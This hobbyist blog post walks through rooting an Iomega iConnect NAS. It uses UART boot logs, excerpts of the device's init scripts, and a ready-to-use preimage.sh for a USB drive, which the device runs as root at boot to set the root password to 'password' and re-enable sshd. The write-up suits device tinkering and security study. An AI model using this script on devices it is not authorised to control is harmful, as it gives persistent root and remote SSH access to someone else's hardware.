Easy Root for the Iomega iConnect

Recently, I have taken to poking around in embedded devices for what I am told by some is something called “fun”. Apparently, word of this hobby of mine has gotten around because a coworker dropped an old Iomega iConnect he had laying around on my desk for me to play with.

The iConnect was billed as a “wireless data station” - kind of a NAS of sorts, but with an emphasis on media streaming. All of the information I could find on the iConnect was from 2010 at the latest, so I’m guessing these things aren’t still being made, but if you happen to get your hands on one, here’s how I managed to get root access on it.

When you crack open the case you can see that, despite the slim form factor, good guy Iomega still manages to keep some header pins for UART access on the board. Connecting to these pins allows you to watch dmesg output during boot and ends with a login prompt. If you already know the root login you could simply get full control of the device this way, but since you’re reading this post I’m going to assume you don’t. Let’s take a closer look at some of the dmesg output.

1
2
3
4
5
6
7
usb 1-1: new high speed USB device using orion-ehci and address 2
USB Device node is /dev/sda1
Checking if there is an attached EMC Imager
usb 1-1: configuration #1 chosen from 1 choice
hub 1-1:1.0: USB hub found
hub 1-1:1.0: 4 ports detected
mount: mounting /dev/sda1 on /usb_drive failed: No such device or address

So, during boot it attempts to mount /dev/sda1 as /usb_drive. That’s good to know! I wonder what happens if we stick a thumb drive in and boot it up again…

1
2
3
4
5
6
7
8
9
10
11
12
13
usb 1-1: new high speed USB device using orion-ehci and address 2
USB Device node is /dev/sda1
Checking if there is an attached EMC Imager
usb 1-1: configuration #1 chosen from 1 choice
hub 1-1:1.0: USB hub found
hub 1-1:1.0: 4 ports detected
usb 1-1.2: new high speed USB device using orion-ehci and address 3
usb 1-1.2: configuration #1 chosen from 1 choice
...<snip>...
FAT: utf8 is not a recommended IO charset for FAT filesystems, filesystem will be case sensitive!
Checking for pre-image script... none.
Image tar file not found: /usb_drive/emctools/iconnect_images/*.tgz
No valid image in USB, start normal boot

Looks like it’s having trouble finding some of the files it’s looking for. I’m sure we can help with that. The script that is doing the heavy lifting here is /initrd/mount_images.sh which tries to mount USB and, if successful, executes a couple of functions called “run_preimage_script” and “extract_validate_image”.

/initrd/mount_images.sh
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
echo "USB Device node is $USB_DEVICE"
echo "Checking if there is an attached EMC Imager"
sleep 10

mkdir -p /usb_drive
mount $USB_DEVICE /usb_drive -t vfat -o async,rw,fmask=0000,dmask=0000,iocharset=utf8
if [ $? -eq 0 ]
then
        # we have an imager attached
        run_preimage_script
        extract_validate_image
        if [ $? -eq 0 ]
        then
                echo "Found EMC Imager with valid image..."
                do_usb_imaging
                umount /usb_drive
        else
                echo "No valid image in USB, start normal boot"
                umount /usb_drive
                mkdir -p sysroot/boot
                ubiattach /dev/ubi_ctrl -m 4
                mount -t ubifs ubi0:boot sysroot/boot
                if [ $? -eq 0 ] && [ -f $APPS_IMAGE ] && [ -f $CONFIG_IMAGE ]
                then
                        do_normal_boot
                else
                        umount sysroot/boot
                        do_network_imaging
                fi
        fi
else
        # no imager, boot
        mkdir -p sysroot/boot
        ubiattach /dev/ubi_ctrl -m 4
        mount -t ubifs ubi0:boot sysroot/boot
        if [ $? -eq 0 ] && [ -f $APPS_IMAGE ] && [ -f $CONFIG_IMAGE ]
        then
                do_normal_boot
        else
                umount sysroot/boot
                do_network_imaging
        fi

fi

These functions are defined in /initrd/common.sh. “run_preimage_script” sounds interesting. Let’s see what it does!

/initrd/common.sh
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
###
# Search for and execute (if found) preimage script.
###
run_preimage_script()
{
        preimage_script=/usb_drive/emctools/iconnect_images/preimage.sh

        echo -n "Checking for pre-image script... "
        if [ -x $preimage_script ]
        then
                echo "found."
                $preimage_script
        else
                echo "none."
        fi
}

Oh dear. So run_preimage_script looks for emctools/iconnect_images/preimage.sh on the USB drive, and, if the file exists, runs it. As root. No questions asked. Told you this is an easy one.

Since this script is being run before the filesystem is fully mounted, we can’t just make a call to passwd to modify the root password, but we can use our script to append a call like that to the end of another script that gets executed later on, like linuxrc for instance. While we’re at it, I also took the liberty of “fixing” their /etc/rc2.d/S50sshd file where they disabled sshd by simply commenting out the line where the daemon gets run, and I end up with the following preimage.sh file in the emctools/iconnect_images/ directory of my thumb drive:

/usb_drive/emctools/iconnect_images/preimage.sh
1
2
3
4
#!/bin/sh

echo "echo -e \"password\\npassword\" | passwd root" >> linuxrc
echo "sed -i 's/\"Starting sshd: \"/\"Starting sshd: \"\\n\\/usr\\/sbin\\/sshd/' /etc/rc2.d/S50sshd" >> linuxrc

Now, if you boot the iConnect with this thumb drive plugged in, it will run the preimage.sh script which changes the root password to “password” and starts sshd. Done.

That’s it for now, but more hilarity is coming soon. Stay tuned.